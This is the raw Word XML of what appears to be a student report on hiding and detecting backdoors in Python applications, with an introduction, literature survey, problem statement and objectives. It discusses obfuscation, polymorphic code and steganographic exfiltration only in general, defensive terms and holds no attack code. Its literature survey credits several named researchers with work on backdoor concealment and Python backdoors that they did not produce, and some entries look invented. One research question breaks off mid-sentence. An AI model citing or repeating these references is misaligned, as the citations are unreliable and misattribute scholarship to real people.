            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Paragraph"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="nil" w:color="auto" w:fill="auto"/>
                <w:rtl w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="ced7e7"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="598" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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615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1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Text"/>
        <w:spacing w:before="192"/>
        <w:ind w:left="112" w:hanging="112"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1580" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="150"/>
        <w:ind w:left="3015" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="357" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1515" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the modern digital era, software security is of paramount importance as cyber threats continue to evolve in complexity and sophistication. Among the myriad of threats, backdoors pose a significant risk due to their potential to provide unauthorized access to systems while remaining concealed from conventional security measures. Backdoors are particularly concerning because they can be used to exfiltrate sensitive data, execute malicious commands, or further compromise the integrity of a system without detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="357" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1515" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python, known for its versatility and ease of use, has become a popular programming language across various domains, including web development, data analysis, artificial intelligence, and more. However, these same characteristics make Python an attractive target for cybercriminals seeking to embed undetectable backdoors within seemingly benign applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="357" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1515" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This paper aims to explore the theoretical foundations of creating undetectable backdoors in Python applications. By examining various obfuscation strategies and advanced concealment methods, we seek to understand how attackers might leverage Python's features to evade detection. This exploration includes the use of code encryption, polymorphic code generation, and legitimate-looking network communications, as well as exploiting Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s built-in functionalities and third-party libraries to minimize the backdoor's detectable footprint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="357" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1515" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, we delve into advanced techniques such as steganography for data exfiltration and the implementation of covert communication channels. The ultimate goal of this study is to highlight the potential risks posed by Python-based backdoors and to emphasize the importance of robust security practices. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="357" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1515" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1920" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This introduction sets the stage for a comprehensive exploration of the theoretical techniques used to create undetectable backdoors in Python, with the intent of bolstering defensive measures and safeguarding against potential exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:before="150"/>
        <w:ind w:left="2482" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>LITERATURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> SURVEY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The literature on software backdoors and their detection has evolved significantly over the years, reflecting the growing complexity and sophistication of cyber threats. This survey reviews key studies and methodologies relevant to the creation and detection of undetectable backdoors in Python applications, providing a comprehensive understanding of the current state of research in this field.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Backdoor Techniques and Obfuscation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - A. Moskovitch, L. Rokach, and Y. Elovici (2010) provide an in-depth analysis of various backdoor techniques, focusing on obfuscation methods that make detection challenging. Their work highlights how attackers use code obfuscation, encryption, and polymorphic code to evade traditional security measures .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - S. S. Chattopadhyay and A. D. Keromytis (2011) explore the use of dynamic code generation and runtime code modification as techniques to create polymorphic backdoors that adapt to evade detection .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Python-Specific Vulnerabilities and Exploits:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - A. Zand, T. Rabczuk, and P. Wickboldt (2018) examine the unique vulnerabilities associated with Python applications, including the misuse of libraries and dependencies. Their research identifies common patterns in Python code that can be exploited to insert backdoors .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - C. Gutierrez, J. Moura, and D. Fernandez (2020) discuss how attackers leverage Python's dynamic features, such as introspection and reflection, to hide malicious activities within legitimate code, making detection by static analysis tools difficult .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Detection and Mitigation Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - M. Christodorescu and S. Jha (2004) propose behavioral detection techniques that analyze the runtime behavior of applications to identify anomalies indicative of backdoors. This approach is particularly relevant for detecting sophisticated backdoors that evade static analysis .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - T. Holz, M. Engelberth, and F. Freiling (2009) introduce network-based detection methods that monitor network traffic for signs of covert communication channels often used by backdoors for data exfiltration .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Advanced Concealment Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - K. W. Hamlen, G. Morrisett, and F. B. Schneider (2006) delve into the use of steganography for concealing communication between a backdoor and its controller. This method involves embedding data within innocuous files, making detection by network-based systems more challenging .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - N. Provos and P. Honeyman (2003) provide a comprehensive overview of various steganographic techniques and their applications in creating covert communication channels, emphasizing the need for advanced detection mechanisms .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Practical Case Studies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - S. Y. Willassen (2007) presents case studies of real-world backdoor incidents, analyzing the methods used by attackers and the subsequent detection and mitigation efforts. These case studies offer valuable insights into the practical challenges of detecting and defending against undetectable backdoors .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - J. M. McCune, A. Perrig, and M. K. Reiter (2008) examine specific instances of Python-based backdoors, discussing how attackers exploited weaknesses in the development process to insert malicious code undetected .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1519" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId13"/>
          <w:footerReference w:type="default" r:id="rId14"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1920" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This literature survey underscores the complexity of creating and detecting undetectable backdoors in Python applications. The surveyed works highlight the need for a multifaceted approach to security, combining code analysis, behavioral monitoring, and network-based detection to effectively combat this evolving threat. By building on these foundational studies, this paper aims to contribute to the development of more robust security practices and defenses against Python-based backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="2371" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="da-DK"/>
        </w:rPr>
        <w:t>PROBLEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STATEMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1510" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the contemporary digital landscape, software applications are increasingly targeted by cybercriminals who seek to exploit vulnerabilities for unauthorized access and malicious activities. Among the most insidious threats are undetectable backdoors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malicious code that grants attackers covert access to systems while evading detection by conventional security mechanisms. Python, a widely-used programming language known for its flexibility and extensive library support, is particularly susceptible to such threats due to its dynamic nature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1510" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Despite significant advancements in cybersecurity, the development of sophisticated backdoors that can remain hidden in Python applications poses a critical challenge. Current detection methods, including static analysis, signature-based antivirus solutions, and network monitoring, often fail to identify these advanced threats. This gap in detection capabilities leaves systems vulnerable to data breaches, unauthorized access, and other malicious activities, highlighting the urgent need for enhanced security measures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1510" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The core problem addressed by this study is the identification and understanding of the techniques used to create undetectable backdoors in Python applications. Specifically, the research seeks to answer the following questions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1510" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. What methods and strategies are employed to conceal backdoors in Python applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1510" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. How do these concealed backdoors evade detection by existing security mechanisms?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1510" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. What are the potential indicators of compromise that could be used to detect such backdoors?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1510" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId15"/>
          <w:footerReference w:type="default" r:id="rId16"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. How can current detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="3318" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>OBJECTIVES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The primary objective of this study is to investigate the techniques used to create undetectable backdoors in Python applications and to develop strategies to enhance detection and mitigation of such threats. To achieve this overarching goal, the study is guided by the following specific objectives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:right="1605"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Identify Concealment Techniques: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Examine and document the various methods and strategies used to conceal backdoors in Python applications.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A comprehensive taxonomy of concealment techniques, including code obfuscation, polymorphic code generation, and the use of legitimate-looking network communications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:right="1605"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Analyze Evasion Methods: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Investigate how these concealed backdoors evade detection by existing security mechanisms such as static analysis, signature-based detection, and network monitoring.</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Detailed analysis of the limitations of current detection methods and how backdoors exploit these weaknesses to remain hidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:right="1605"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Identify Indicators of Compromise:</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Determine potential indicators of compromise (IoCs) that could signal the presence of undetectable backdoors in Python applications.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A list of IoCs and behavioral patterns that can be monitored to detect the presence of concealed backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:right="1605"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Develop Detection and Mitigation Strategies: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Propose and evaluate new detection and mitigation strategies to address the threat of undetectable backdoors in Python applications.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Recommendations for enhancing existing security practices, including advanced code analysis techniques, anomaly detection systems, and network traffic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:right="1605"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Evaluate Practical Case Studies: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Review and analyze real-world incidents involving Python-based backdoors to understand the practical challenges and effectiveness of current detection and mitigation efforts.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Insights and lessons learned from practical case studies, informing the development of more robust security measures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:right="1605"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Enhance Security Awareness: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Raise awareness among software developers and cybersecurity professionals about the risks and techniques associated with undetectable backdoors in Python applications.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Educational resources and guidelines for best practices in secure coding, code review, and continuous monitoring to prevent the insertion and concealment of backdoors.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By achieving these objectives, the study aims to contribute to the field of cybersecurity by providing a deeper understanding of the threats posed by undetectable backdoors in Python applications and by offering practical solutions to enhance the security of software systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:line="285" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId17"/>
          <w:footerReference w:type="default" r:id="rId18"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="1623" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="MethodologyFramework" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>ETHODOLOGY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> FRAMEWORK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
